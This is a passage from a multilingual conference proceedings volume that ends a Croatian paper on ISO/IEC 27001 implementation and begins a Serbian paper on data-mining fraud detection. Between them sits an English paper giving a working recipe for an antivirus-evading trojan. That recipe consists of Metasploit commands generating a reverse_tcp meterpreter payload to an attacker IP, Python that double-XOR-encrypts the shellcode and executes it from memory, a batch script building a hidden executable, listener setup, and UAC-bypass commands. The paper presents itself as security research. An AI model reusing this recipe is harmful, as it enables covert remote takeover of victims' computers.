5.2 A.5.1.1

Sigurnosna politika

3 Definicija metode procjene rizika

6.1.2.a) 6.1.2.b)

• Pristup organizacije, metode i analize za postizanja zahtijevane razine sigurnosti

• Lista potencijalnih ciljeva i sigurnosnih mjera (kontrola) – referenca na Aneks A ISO/IEC 27001

• Lista dodatnih kontrola koje nisu definirane u ISMS certifikacijskim kriterijima (ako ih ima)

4 Identifikacija rizika 6.1.2.c) Popis imovine i lista rizika

5 Analiza i ocjena rizika

6.1.2.d) 6.1.2.e)

Izvještaj o rezultatima analize i ocjene rizika

6 Obrada rizika

6.1.3 8.3

Izvještaj o rezultatima obrade rizika

7 Izbor ciljeva kontrola i kontrola

Standardi mjerenja rizika

8

Priprema dokumenta: Izjava o primjenljivosti

6.1.3.d) Dokument SoA


62

KORAK OPIS ZAHTJEV IZLAZNI DOKUMENT

9

Osiguranje uprave za odobrenje i prihvaćanje preostalog rizika

6.3.1.f)

Pisano odobrenje za preostali rizik

10

Osiguranje autorizacije uprave za implementaciju plana obrade rizika

Pisano odobrenje za implementaciju ISMS

11 Implementacija kontrola Implementacija svih planiranih kontrola kroz SoA

dokument

12 Svjesnost i edukacija

Osiguranje potrebnog nivoa svjesnosti kod svih uključenih u opseg ISMS-a, te potrebna edukacija za primjenu dokumentiranih zahtjeva implementiranog ISMS-a

13 Interni audit

14 Korektivne aktivnosti Eventualna provedba korektivnih aktivnosti

utvrđenih internim auditom

15 Certifikacijski audit

Ovi koraci implementacije su logični i funkcionalno se nastavljaju jedan na drugoga što značajno olakšava implementaciju.

5. ZAKLJUČAK

Implementacija ISMS prema standardu ISO/IEC 27001:2013 u biti je jednostavnija od implementacije prema prethodnoj reviziji. To naravno zavisi od veličine kompanije, odnosno opsega ISMS-a, ali je u svakom slučaju racionalnija.

Opseg dokumentacije se objektivno smanjuje, ali prvenstveno boljom raspodjelom kontrola, odnosno sigurnosnih područja, ciljeva i samih kontrola. Time se može više kontrola dokumentirati u jednom dokumentiranoj informaciji, a da i dalje bude praktično upotrebljivo. Uz to, nova revizija ima manje obveznih dokumentiranih informacija u usporedbi s prethodnom revizijom. Kod većih kompanija broj dokumentiranih informacije normalno će biti veći nego kod malih, jer prirodom njihovog djelovanja i poslovnih politika one će i dalje trebati više dokumentirati svoje procedura, što kod malih kompanija u pravilu nije potrebno.

Ono što i dalje ostaje kao nužnost implementacije ISMS-a je visoka stručnost i iskustvo onih koji pripremaju i provode implementaciju.


63

LITERATURA

[1] ISO/IEC 27000:2014 Information technology -- Security techniques -- Information security management systems -- Overview and vocabulary

[2] ISO/IEC 27001:2013 Information technology -- Security techniques -- Information security management systems – Requirements

[3] ISO/IEC 27002:2013 Information technology -- Security techniques -- Code of practice for information security controls

[4] ISO/IEC 27003:2010 Information technology -- Security techniques -- Information security management system implementation guidance

[5] ISO/IEC 27004:2009 Information technology -- Security techniques -- Information security management – Measurement

[6] ISO/IEC 27005:2011 Information technology -- Security techniques -- Information security risk management

[7] ISO 31000:2009 Risk management -- Principles and guidelines

ISO/IEC Directives Part 1 and Consolidated ISO Supplement - 2014 (5th edition)

65

HACKER ATTACKS

Undetectable Attacks from Trojans with Reverse Communication

Ethical Hacker / Penetration Tester, Mane Piperevski, Master of Science - Author12 Ethical Hacker / Penetration Tester, Filip Simeonov, Bachelor of Science - Co-author 13

Abstract - Computer integration in everyday human life create a motive for developing sophisticated and undetectable malicious codes, Trojans with reverse communication that make use of deficiencies and vulnerability in the chain of security. Keywords - component; trojan; malicious code; reverse communication; hacker; attack.

Introduction

With enlargement of amount of classified data that is stored in computer systems, we are facing increase in interest among evil hackers who are motivated to make research and improve in hacking techniques and attacks. Usage of computers systems means that often we are installing and executing new programs and files that goes through security check by controls present inside and alongside operation systems. Computer users are guided by false assumptions in order to eliminate possibility for them to be victim of a hacker attack. Often they are making assumptions like: “Evil hacker are not interested in us”, “There is no space to be afraid of evil hackers, we have firewall and professional antivirus software.”, “I am using licensed operating systems and software on my PC”.

On a large scale of attacks, evil hacker are bypassing the security system with usage of social engineering technique and widely used hacker tool, evil software code better known as Trojan horse with reverse connection (later in text as Trojan). The title of this tool comes from his characteristics that are the deriving from Greek methodology Trojan horse who seamlessly harmless had successfully gain access to protected part of city Troy and deliver enemy forces bypassing all seciyrity measures that protected the city. This paper will use “Metasploit Framework” as a toll for automated contruction of malicious code (Trojan) alongside “XOR” algorithm which is used as encryption technique. Increase of new Trojan appearance in period of 2008 till 2013 is measured in enlargement of 200% on yearly level. Free and publicly accessible Trojan construction software tools have contributed towards mass usage of Trojans in hacker attacks.

Basic Trojan characteristics

Trojan definition

Trojan is a software that contains evil and harmful program code in seamlessly harmless program code or data that can gain control and cause damage destroying files and hard 12 Piperevski & Associates, Skopje - Republic of Macedonia, [email protected] 13 Piperevski & Associates, Skopje - Republic of Macedonia, [email protected]

Hacker Attacks Zbornik radova Mane Piperevski; Filip Simeonov

66

drive partitions. Trojans can replicate themselves, easily spread and activate themselves with use of built in capability to act on occurrence of certain predefined conditions. With the usage of Trojans, Evil hackers can access passwords in compromised computer systems (later in this text under title “victim”), personal files, deleted files and interact with active user sessions.

Trojans Communication channels

Making Trojan Reverse Communication by evil hacker is executed with Trojan activation at victim side or/and usage of Trojan function called “backdoor”. Communication can be established by usage of next two channels:

− Open Channel – Legitimate way of communication that enables data transfer at computer system or network. Legitimate programs like computer games are using this type of communication channel.

− Covert Channel – Unauthorized way of communication that is often used for transfer of classified information at computer system or network.

Trojan targets

Guided by nature and type of hacker attacks, Trojan targets are noted as: − Deleting or overwriting of critical operating system files. − Generating fake traffic to accomplish “DoS - Denial of Service” attacks. − Downloading spy software, marketing software and harmful program code. − Screen capture and record active user session, audio and video capture of victim

connected devices. − Stealing information’s like passwords, secure code, credit card information and

other type of financial data trough usage of Trojan function “Keylogger”. − Fully or partially disabling firewall and antivirus protection. − Creating separate back entry trough which later reestablishing communication

with victim can be made over usage of function “Backdoor” − Creating proxy server at victim side that can relay other evil hacker attacks. − Victim usage as part of “Botnet” network for executing “DDoS - Distributed

Denial of Service” attacks. − Victim usage as point of further infection and spreading spam and other

electronic messages.

Trojan Construction

Two program packets, (non-malicious) carrier program, and malicious payload construct Trojan by itself. The carrier program is responsible for file type that will be executed by the Trojan right after the victim executes it in her operating system. The Payload is responsible for file type that the Trojan will execute alongside carrier program within execution by the victim. Often usage of execution type is “EXE-Executable File”. The carrier by itself can represent legitimate simple program code like execution of function “Message Popup”. On the other side, the payload is constructed with shellcode that has all Trojan


67

functions and capabilities. At certain Trojans, we have possibility for upgrading payload functions and capabilities after first infection within victim computer system and execution of reverse communication channel with evil hacker.

Often used by todays Trojans is

reverse communication where the victim initiates and establishes the communication with evil hacker, his command center. In order to be under camouflage, the Trojan can use wrapping technique with usage of program/algorithm called “Wrapper” where it can wrap itself together with harmless and simple program like computer game or everyday usage program. For the computer user, the wrapped files represent one visual file where in case of execution the user never notice background execution of the Trojan shellcode, Picture 1.

Picture 1: Example of Trojan construction with "Wrapper".

For construction of shellcode in payload in this paper we are using hacker tool “Metasploit Framework”. This tool is very complex and prebuild with lot of commands, functions alongside with huge database of predefined payloads, exploits and other hacking accessories programs.

Creating “shellcode”

I order hackers to easily create the shellcode, a special type of command “msfpayload” from Metasploit Framework can be used. This command has options for customizing the program code for payload creation and possibility for selection of predefined program code that is constructed by the Trojan needs. Part of those needs can be conditions for communication, usage of IPv4 and IPv6 addresses alongside usage of HTTP or HTTPS protocol.

The parameters that are required for creating the shellcode in case with predefined payload with reverse communication (reverse_tcp) are:

− Parameter “LHOST” that presents the address of evil hacker with his computer control center. The shape of this data can be standard IP address or internet domain.

− Parameter “LPORT” that presents network port used for reverse communication with evil hacker and his computer control center.

Techniques for Trojan camouflage

In order to be undetectable, the Trojan may use techniques in which his payload is encrypted in a way that security controls and antivirus will not be able to detect it. The Trojan camouflage is enabled with encryption. Next two techniques are most often used for doing that.

− The application “Metasploit Framework” has command msfencode that is used as option for encrypting previously generated shellcode. With possibility to choose from


68

29 predefined algorithms for encryption, this technique is widely used. As addition, this technique can multiply usage of encryption on previously generated shellcode and significantly degrease the possibility for detection.

− One of the most successful techniques for Trojan camouflage is use of “XOR” algorithm with unique encryption key. The secret for getting successful camouflage with technique is use of long and complex string for key followed by double use of “XOR” algorithm. Mostly used programing language for executing this technique is Python and Ruby as they present often used languages among hackers.

Scenarios for Trojan hacking attacks

In this scenario as victim platform we have Windows OS (tested on Windows 7 Enterprise 32bit with active protection User Access Control – UAC and antivirus program – Microsoft Security Essential) and Linux OS (released preinstalled OS -Kali Linux) as attacker platform. The victim platform is fully updated by the time this paper is created. This paper does not cover the way the attacker delivers the Trojan at victim side. We can only say that most successful way of delivering the Trojan is use of infected media, email or visiting infected webpage. The attack is created within next steps in order of their appearance:

Generating "Shell Code"

Generating the shellcode is done with help of Metasploit Framework which is prebuild in Kali Linux. The command line used for this action is displayed in Table 1.

TABLE 1: GENERATING "SHELLCODE"

Command that is executed on attacker platform OS terminal

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.254.131 LPORT=12345 R msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.254.131 LPORT=12345 R | msfencode -a x86 -c 1 x86/shikata_ga_nai -t c | tr -d '"' | tr -d '\n'

In previous specified command we have set parameters for attackers command control center, IP address (192.168.254.131), open listener port (12345) and encryption with use of algorithm "shika- ta_ga_nai". Rest of the parameters are given in purpose of creating larger and right format shellcode for usage in next step of this attack.

Encryption of previous step generated "ShellCode"

This paper is using Python program language for creating encryption program. The purpose of this program is use of algorithm “XOR” for creating undetectable shellcode for the Trojan.

1) First step of encryption with “XOR” algorithm

We create separate program for encryption (codding.py) displayed in Table 2. In this program we use long and complex key as input in “XOR” algorithm.


69

TABLE 2: FIRST STEP OF ENCRYPTION

codding.py

from itertools import izip, cycle def xor_crypt_string(data, key): return ''.join(chr(ord(x) ^ ord(y)) for (x,y) in

izip(data, cycle(key))) def hexlify(b): return "\\x%02x"*len(b) % tuple(map(ord, b)) shellcode = 'GENERATED_SHELLCODE' key = '(Pdj6Lxh_5*oab81BAOJ}/G' encrypted = xor_crypt_string(shellcode, key)

print hexlify(encrypted)

This program is using Python command - hexlify that is converting the shellcode from binary to hexadecimal presentation.

2) Second step of encryption

The shellcode that we received as output from previous program codding.py is used as input in next program called creation.py displayed in Table 3. This program executes encryption second time and gives the output code to list of commands in Python (displayed in Table 4) for generating final executable file.

TABLE 3: SECOND STEP OF ENCRYPTION

creation.py

from itertools import izip, cycle from ctypes import * def xor_crypt_string(data, key): return ''.join(chr(ord(x) ^ ord(y)) for (x,y) in

izip(data, cycle(key))) key = '(Pdj6Lxh_5*oab81BAOJ }/G' cipher = 'ENCODED_SHELLCODE' data = xor_crypt_string(cipher, key) memory = create_string_buffer(data, len(data)) binary = cast(memory, CFUNCTYPE(c_void_p))

binary()

TABLE 4: GENERATING FINAL EXECUTABLE FILE

creating.bat

@echo off set PATH=%PATH%;c:\Python27\ python Configure.py python Makespec.py --ascii --onefile --noconsole --

icon ..\ creation.ico ..\ creation.py python Build.py template\template.spec

copy template\dist\template.exe ..


70

Preparing to capture reverse communication

We create listener server on port 12345 at attacker operation system. Within execution of the Trojan he will create reverse communication towards created listener server on port 12345. This established communication will alow direct access to Operating system on victim side which means that the evil hacker “pwnd” the victim. This is done with use of next specified commands displayed in Table 5.

TABLE 5: CREATING LISTENER SERVER AT ATTACKER SIDE


msfconsole use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.254.131 set LPORT 12345 set ExitOnSession false set AutoRunScript migrate -f exploit -j

Bypassing Windows Security User Access Control – UAC

The same moment the Trojan is activated for execution of the victim site, he will create reverse communication with evil hacker attacker platform. Although the hacker has successfully gain unauthorized access to victim site, this session does not have administrative privileges because of Windows Security User Access Control – UAC in place. In order to remove this security control the evil hacker can use build in auxiliary tool in Metasploit Framework as one of the techniques for bypassing UAC. The commands within Table 6 are used for bypassing UAC.

TABLE 6: BUPASSING "UAC" PROTECTION


run post/windows/escalate/bypassuac background sessions -i 1 getuid getsystem

The evil hacker gains full administrator privilege access to the victim site within successful execution of commands.

Used literature

[1] TJ O'Connor, “Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers,” Syngress, November 2012.

[2] David Kennedy, “Metasploit: The Penetration Tester's Guide,” No Starch Press, July 2011. [3] Willie Pritchett, David De Smet, “BackTrack 5 Cookbook,” Packt Publishing, December 2012.

71

OTKRIVANJE PREVARA POMOĆU DATA MINING-A

FRAUD DETECTION WITH DATA MINING

dr Dragana Ćamilović, profesor14

Sadržaj: Svake godine prevare su sve učestalije, što uzrokuje milijarde dolara gubitka. Ovo je glavni razlog zašto se sve više pažnje poklanja njihovom otkrivanju. Jedan od pristupa uspešnom otkrivanju i suzbijanju prevara je data mining. U tu svrhu se mogu koristiti razli- čite data mining tehnike, uključujući i neuronske mreže, stabla odlučivanja i klasterovanje, detaljno opisane u ovom radu. Kroz različite primere je pokazano kako se data mining tehnike koriste u otkrivanju prevara sa kreditnim karticama, kao i prevara u telekomunikacijama i zdravstvu. Ključne reči: Data mining, otkrivanje prevara, data mining tehnike Abstract: Every year fraud is increasing, causing billion dollars losses. This is the main reason for the growing attention to fraud detection. One of the approaches known for detecting and fighting fraud successfully is data mining. Thus different data mining techniques can be used, including neural networks, decision trees, and clustering, all described in detail in this paper. Through various examples the paper illustrates how to apply data mining techniques to the detection of credit card fraud, as well as telecommunications and healthcare fraud. Key words: Data mining, fraud detection, data mining techniques

1. UVOD

Pod prevarom se podrazumevaju sve nezakonite radnje koje imaju karakteristike obmane, prikrivanja ili zloupotrebe poverenja, a mogu ih počiniti lica i organizacije sa ciljem sticanja novca, imovine ili usluga, u cilju izbegavanja plaćanja ili gubitaka usluga, ili u cilju osiguranja lične ili poslovne dobiti [1].

Globalno istraživanje o privrednom kriminalu iz 2014. godine koje je sproveo PwC (PwC's 2014 Global Economic Crime Survey) je pokazalo da je blizu 40% ispitanika izjavilo da su bili žrtva prevare, a uočeno je i da postoji povećanje od 3% u odnosu na prethodno istraživanje iz 2011. godine [2]. Pored ogromnih novčanih gubitaka, kompanije imaju i druge gubitke. Ispitanici su najčešće navodili gubitak morala zaposlenih (31% ispitanika), reputacije firme i štete nanete poslovnim odnosima (17% ispitanika). Međutim, uprkos novčanim i drugim gubicima, srećom je samo 3% ispitanika navelo da su incidenti prevare uticali na cenu akcija firme (op.cit.).

Postoji veliki broj načina na koji se može počiniti prevara, a najpoznatiji su: nelega- lne transakcije pri korišćenju kreditnih kartica, e-commerce sistema, pranje novca u okviru 14 Visoka škola za ekonomiju i upravu, Imotska 1, Beograd, [email protected]

Otkrivanje prevara pomoću data mining-a Zbornik radova Dragana Ćamilović

72

finansijskih sistema, zloupotrebe pri korišćenju telekomunikacionih usluga, ili prevarantski zahtevi u okviru zdravstvenog osiguranja [3]. Naravno, bitno je obezbediti otkrivanje svakog sumnjivog ponašanja, a poželjno je da se detekcija vrši u realnom vremenu. Ovako je moguće na vreme reagovati i sprečiti nastanak veće štete. Primena data mining-a u cilju otkrivanja prevara se pokazala jako uspešnom. Zato će u ovom radu biti objašnjeno šta je to data mining, kako se sprovodi data mining projekat, kao i koje njegove tehnike se koriste za otkrivanje prevara u praksi i kako.

2. DATA MINING

Data mining predstavlja rezultat prirodne evolucije informacionih tehnologija [4]. Tako su se 1960-tih i ranije podaci prikupljali uglavnom u oviru datoteka (odnosno file-ova), zatim su 1970-tih razvijeni sistemi za upravljanje bazama podataka, da bi se već od 1980-tih počeli razvijati koncepti napredne analize podataka, koji uključuju skladišta podataka (data warehouse), kao i data mining (op.cit.). Potreba za ovom naprednom analizom podataka je nastala zbog činjenice da su firme vremenom bivale zatrpane podacima, tako da je postalo nemoguće analizirati ih na tradicionalan način. Data mining upravo i predstavlja proces koji koristi statističke i matematičke metode, kao i tehnike veštačke inteligencije i mašinskog učenja zarad generisanja korisnih informacija i znanja iz tih velikih baza podataka [5]. Ranije je u stručnoj literaturi uglavnom posmatran kao proces otkrivanja paterna u podacima, što se npr. može naći i u [6]. Međutim, kako se navodi u [5], kasnije je ta izvorna definicija izmenjena kako bi uključila sve oblike automatizovane analize podataka. Inače, u literaturi na srpskom jeziku ne postoji potpuna saglasnost oko toga kako ovaj termin treba prevesti, te će iz tog razloga u ovom radu i biti ostavljen njegov izvorni naziv na engleskom jeziku. Neki domaći autori ga nazivaju rudarenje podataka, što je doslovan prevod, drugi koriste termin traganje kroz podatke. Ova dva prevoda su najzastupljenija.

Svaki data mining projekat se realizuje u nekoliko koraka, a Ćirić u [7] identifikuje sledeće:

• 1. Definicija poslovnog problema. Ovaj korak zahteva da se razume sopstveno poslovanje i podaci, kao i da se utvrdi koji se problem želi rešiti. Takođe je jako bitno jasno definisati ciljeve koji se žele dostići, jer od toga zavisi i koji će se model primeniti i na koji način će biti mereni rezultati projekta.

• 2. Kreiranje data mining baze podataka. Podaci za data mining moraju biti smešteni u okviru baze, ali nije uvek nužno da iza te baze stoji sistem za upravljanje bazama podataka. Nekada to može biti obična datoteka ili spreadsheet. Uko- liko postoji skladište podataka, nije preporučljivo direktno ga koristiti, jer je u pogledu intenziteta pristupa bazi data mining proces vrlo zahtevan. A i najčešće sama struktura podataka u skladištu ne odgovara analitičkim i statističkim metodama data mining-a. U principu, ovaj korak podrazumeva da je podatke potrebno najpre prikupiti, zatim opisati, odabrati one podskupove koji će se istraživati, obezbediti odgovarajući kvalitet podataka, integrisati ih i konsolidovati (ukoliko potiču iz različitih izvora), a nakon toga izraditi metapodatke. Zatim sledi učita- vanje data mining baze podataka (odnosno podizanje baze). Nakon što je krei- rana, ona se mora nadgledati i održavati.

• 3. Istraživanje podataka. Ovaj korak obično uključuje definisanje varijabli koje će se koristiti za predviđanje.


73

• 4. Priprema podataka za modeliranje. Ovaj korak ima nekoliko faza, a to su: odre- đivanje varijabli za modeliranje, odabir zapisa odnosno slogova koji će se analizirati, konstrukcija novih varijabli (ukoliko se za tim ukaže potreba), kao i preobražaj varijabli (s obzirom da korišćeni alat diktira način reprezentacije podataka).

• 5. Kreiranje modela. Pošto se odabere tip predviđanja, sledi odabir modela, kao što su stabla odlučivanja ili neuronske mreže. Zatim se podaci dele u dve grupe: jednu koja služi za izradu modela i drugu koja je namenjena njegovom testiranju i validaciji.

• 6. Ocena modela. Nakon izrade modela, sledi evaluacija rezultata i interpretacija njihovog značenja. Treba utvrditi pouzdanost modela, mada ovo nije nužno odlučujući faktor za izbor najboljeg modela. Za dobar izbor je potrebno izvršiti detaljnu analizu tipova grešaka i troškova koji iz njih proizilaze. Čak i da je procenjena pouzdanost modela jako visoka, to ne znači da će se i u realnom sistemu dobiti isti rezultati. Iz tih je razloga neophodno model testirati u realnom sistemu.

• 7. Implementacija modela i rezultati. Napravljeni model se može koristiti na dva načina: prvi je da na osnovu njegove primene analitičari predlože akcije koje su izvedene iz modela i njegovih rezultata, a drugi je da se model primenjuje na različitim izvorima podataka. Data mining modeli su često samo deo složenijih aplikacija. Pored implementacije, važno je kontinuirano pratiti performanse modela. Naime, tokom vremena sistemi se menjaju, pa je potrebno i sam model uskladiti sa promenama u okruženju i samom sistemu. A može se desiti i da se javi potreba da se isprojektuje potpuno nov model.

Ćirić takođe naglašava da treba imati u vidu da data mining projekat nije linearan, te da je nužno ponekad se vratiti na neki od prethodnih koraka (op.cit.). Opisani model daje dobre smernice prilikom korišćenja u njemu pomenutih data mining tehnika: neuronskih mreža i stabla odlučivanja. Ovo ujedno i jesu vrlo često korišćene tehnike za potrebe otkrivanja prevara, ali se u nedostatku istorijskih podataka o fraud ponašanjima može koristiti i još jedna metoda - klasterovanje. Sve pomenute tehnike i metode su opisane u sledećem odeljku rada.

3. DATA MINING TEHNIKE I METODE

Veliki broj naučnih i stručnih radova predlaže da se zarad otkrivanja prevare koriste neuronske mreže, stabla odlučivanja ili klasterovanje. Naravno, moguće je kombinovati i veći broj data mining tehnika i metoda.

Neuronske mreže treba da simuliraju rad bioloških neuronskih mreža, pa stoga treba najpre razumeti kako one funkcionišu. Ljudski mozak je sastavljen od velikog broja ćelija koje se nazivaju neuroni, koji se povezuju u mreže. Neuron je specijalizovana ćelija koja ima sposobnost prenošenja elektrohemijskog signala. Sama ćelija se sastoji od tela (soma), koje u svom centru poseduje nukleus, odnosno jezgro. Pri tome ulaze u ćeliju obezbeđuju dendriti, a svaki nukleus poseduje i izlaznu osu koja se naziva akson. Akson jedne ćelije je povezan sa dendritom druge preko sinapse. Pri tome sinapsa ima mogućnost promene signala koji jedan neuron šalje drugom [8]. Ilić u [9] navodi da se kod bioloških sistema učenje obavlja putem regulisanja sinaptičkih veza. Tako se učenje tipičnih događaja putem primera ostvaruje preko treninga ili otkrića tačnih setova podataka ulaza-izlaza koji treniraju algoritam ponavljanjem, tako što podešavaju propusne (težinske) koeficijente veza (sinapse). Ove veze zapravo memorišu znanje koje je neophodno za rešavanje specifičnog problema (op.cit.).


74

Kod veštačkih neuronskih mreža ekvivalent biološkog neurona je element procesiranja. Veštački neuron prima ulaze koje procesira dajući izlaz, što je i prikazano na Slici 1 [8].

Slika 1: Veštački neuron (element procesiranja)

Svaki ulaz zapravo predstavlja jedan atribut. Tačnije, ulaz u mrežu je numerička vrednost atributa (Xi). Svrha mreže je da da rešenje problema, odnosno izlaz tj. Y. Sinapse kojima biološki neuroni regulišu prohodnost određene putanje između aksona i dendrita, kod veštačkih neurona se ostvaruju preko prilagodljivih težinskih koeficijenata (Wi). Težinom je predstavljena značajnost svakog ulaza. Pre početka procesa učenja težine se postavljaju na proizvoljnu vrednost, a sa svakim novim setom podataka težine se podešavaju tako da se smanjuje razlika između stvarnog i željenog izlaza. Idealno bi bilo kada ova razlika ne bi ni po- stojala, odnosno kada bi bila jednaka nuli. Međutim, to u praksi nije slučaj, pa se obično zadaje nivo greške, izražene u procentu koji treba dostići da bi se okončao proces učenja. Umesto nivoa greške može se i unapred zadati broj iteracija pri učenju.

Funkcija koja svaki ulazni element Xi množi sa njegovom težinom Wi, pa ih sabira radi dobijanja težinske sume Y naziva se funkcijom sumiranja. Za n ulaza u jedan element procesiranja ta funkcija ima sledeći oblik:

i

n

iiWXY ∑

=

=1

.

Zatim funkcija transformacije (transfera) treba da odredi da li rezultat funkcije sumiranja može da proizvede izlaz. Veza između nivoa aktivizacije i izlaza može biti linearna i nelinearna. Često se koristi sigmoidna funkcija:

YT eY −+

=1

1 ,

gde je YT normalizovana vrednost od Y. Ovakva transformacija treba da modifikuje izlazni nivo na vrednost između 0 i 1.

Zbog velike upotrebljivosti i popularnosti, danas na tržištu postoji veliki broj softverskih proizvoda koji omogućavaju kreiranje i korišćenje veštačkih neuronskih mreža, a moguće je čak realizovati ih i hardverski.

Još jedna često korišćena data mining tehnika su stabla odlučivanja. Ćirić u [7] stablo odlučivanja vidi kao seriju pravila pomoću kojih se izdvajaju određene klase ili vrednosti


75

(npr. transaksije bi se mogle podeliti na legitimne i fraud). Stablom se veći broj slogova deli u sve manje i manje grupe, sukcesivnom primenom određenih pravila. Ono započinje korenom, koje predstavlja prvi test koji će se uraditi, a zatim se kao rezulat tog testa ono grana na podstabla. Ovaj postupak se sukcesivno ponavlja sve dok se ne dođe do tzv. listova ili krajnjih čvorova, koji predstavljaju završnu klasifikaciju i odgovor na postavljeno pitanje (op.cit.). Postoji veći broj algoritama koje je moguće koristiti, među kojima su najpoznatiji ID3, C4.5, C5, CART, ili pak CHAID [5].

Metode klasterovanja spadaju u tzv. indirektne metode (undirected data mining), a pripadaju i grupi učenja bez nadzora (unsupervised learning). Sve indirektne metode, pa i metode klasterovanja, služe otkrivanju globalne strukture podataka, pa u ovom slučaju ne postoji neki ciljni atribut, kao što je to slučaj sa direktnim metodama (npr. stablima odlučivanja).

Klasterovanje podrazumeva podelu skupa fizičkih ili apstraktnih objekata unutar grupa koje po [10] moraju zadovoljiti dva osnovna kriterijuma:

− svaka grupa predstavlja homogen skup: objekti koji pripadaju istoj grupi su me- đusobno slični i

− svaka se grupa razlikuje u odnosu na ostale tj. objekti koji pripadaju određenoj grupi značajno se razlikuju od onih koji pripadaju ostalim grupama.

Metode klasterovanja služe, dakle, za otkrivanje grupa sličnih objekata. Međutim, čovek je taj koji treba da odredi da li formirani klasteri imaju smisla. Klasterovanje najčešće ne predstavlja data mining tehniku koja se koristi zasebno. Obično se primenjuju i druge data mining metode, kako bi se otkrile prave karakteristike formiranih klastera. Postoji veći broj algoritama koji se mogu koristiti za klasterovanje, a među poznatijima su: metod k-sredina, PAM, CLARA, CLARANS, BIRCH, CURE itd.

Sve tri data mining tehnike i metode se dosta uspešno primenjuju u praksi, za različite svrhe. Između ostalog, i za potrebe otkrivanja prevara, što je naredna tema ovog rada.

4. KORIŠĆENJE DATA MINING-A ZA OTKRIVANJE PREVARA U PRAKSI

Data mining algoritmi uspešno otkrivaju prevare različitih vrsta: zloupotrebe kreditnih kartica, zloupotrebe u telekomunikacijama, zdravstvu itd. Ovde će biti izložena neka od rešenja iz prakse i biće diskutovano kada je koju tehniku data mining-a najbolje koristiti.

Zloupotrebe kreditnih kartica su pogotovo prisutne na internetu i veliki broj ljudi je, na žalost, bio žrtva ovog oblika prevare. Zbog toga je važno obezbediti otkrivanje svakog nelegalnog/neovlašćenog korišćenja kreditnih kartica u realnom vremenu (real time) . Za ovu svrhu se mogu koristiti veštačke neuronske mreže. Akhilomen u [11] navodi da se neuronska mreža koristi za identifikaciju paterna, odnosno obrasca ponašanja korisnika kartice, što se čini na osnovu njegovih aktivnosti u poslednjih godinu do dve dana. On predlaže da se po- smatraju podaci o sajtovima na kojima korisnik kartice obično kupuje, geografskim lokaci- jama sa kojih su izvšene transakcije (grad i državu je moguće identifikovati na osnovu IP adrese), adresi na koje se šalju kupljeni proizvodi, kontaktima koje je ostavio (e-mail adresa i broj telefona). Nakon toga je moguće za svaku narednu transakciju oceniti da li je u skladu sa identifikovanim obrascem ponašanja. Ukoliko se ponašanje razlikuje, sistem ga onda upoređuje sa pređašnjim nelegalnim transakcijama. Ukoliko ovde ne nađe sličnosti tj. ukoliko


76

tekuća transakcija nije u skladu sa ranijim fraud transakcijama, sistem javlja da se radi o sumnjivoj transakciji. U suprotnom, transakciju označava kao nelegalnu tj. fraud (op.cit.).

Za otkrivanje pronevera kreditnih kartica mogu se koristiti i druge data mining tehnike, kao što su stabla odlučivanja. Jedan od implementiranih sistema je opisan u [3], gde su autori pored modela korišćenjem stabla odlučivanja opisali i modele koji se zasnivaju na drugoj tehnici – mašinama potpornih vektora (Support Vector Machine, SVM). Zanimljivo je da su prvi uspešnije otkrivali prevare (pogotovo C&RT model).

Još jedan interesantan primer upotrebe data mining-a je u sferi otkrivanja zloupotreba u korišćenju kompanijskih kartica i izložen je u [12]. Ovaj sistem za otkrivanje prevara je trebalo da među kupovinama koje su ovlašćeni korisnici kompanijskih kartica načinili uoči one koje su predstavljale nenamensko trošenje budžetskih sredstava, s obzirom da se radilo o korisnicima iz državnih firmi. U ovoj studiji slučaja je zarad identifikacije paterna odabrano klasterovanje, a korišćeni su podaci o načinjenim transakcijama. Klasterovanje, kao što je već rečeno, spada u grupu modela učenja bez nadzora, a ovde se koristilo jer je bilo nemoguće identifikovati ciljno polje tj. atribut, s obzirom da se podaci nisu nikad ranije analizirali u cilju otkrivanja prevara (tako da nije postojao skup pređašnjih transakcija koje su označene kao legitimne ili fraud). Nakon što je broj klastera podešen na 40, prilikom posmatranja rezultata uočeno je da je u jednom klasteru prosečan broj kupovina u kategoriji proizvoda namenjenih sportu i zabavi visok. Detaljnijim pregledom podataka u okviru ovog klastera je primećeno da su se ovde našle i transakcije plaćanja restorana, hotela, kao i transakcije koje su načinjene vikendom. Ovo je jasno ukazalo na nenamensko trošenje budžetskih sredstava. Ovakva klaster analiza se dalje može koristiti za izgradnju baze znanja za otkrivanje prevara, mada je krajnji cilj kreiranje modela učenja pod nadzorom (supervised learning), kao što su neuronske mreže (op.cit.).

Prevare su takođe veliki problem telekomunikacionih kompanija. Weiss u [13] identifikuje dve kategorije prevara, odnosno zloupotreba. Jedna je da se neko prijavi kao korisnik usluga sa namerom da nikad ne plati račun koji će napraviti, a druga podrazumeva da neko u tuđe ime koristi telekomunikacione usluge legitimnog pretplatnika (op.cit.). Naravno, kao i u slučaju zloupotreba kreditnih kartica, bitno je obezbediti otkrivanje zloupotrebe nečijeg telefonskog broja u realnom vremenu (kako bi se on po potrebi privremeno deaktivi- rao). A slični su i načini otkrivanja: i ovde je potrebno posmatrati pređašnje ponašanje korisnika usluga u cilju identifikacije paterna, samo što se ovde umesto novčanih transakcija po- smatraju podaci o načinjenim pozivima sadržanim u tzv. CDRs (Call Detail Records). Koriste se i podaci o korisnicima usluga, kao što su npr. podaci o tarifnom paketu ili kreditnom rejtingu (op.cit.). Zatim se svi naknadni pozivi porede sa identifikovanim obrascem ponaša- nja, i ako postoje odstupanja, sistem treba da signalizira da se možda radi o zloupotrebi. Pošto je problematika slična prevarama sa kreditnim karticama, i ovde se mogu koristiti već pomenute data mining tehnike.

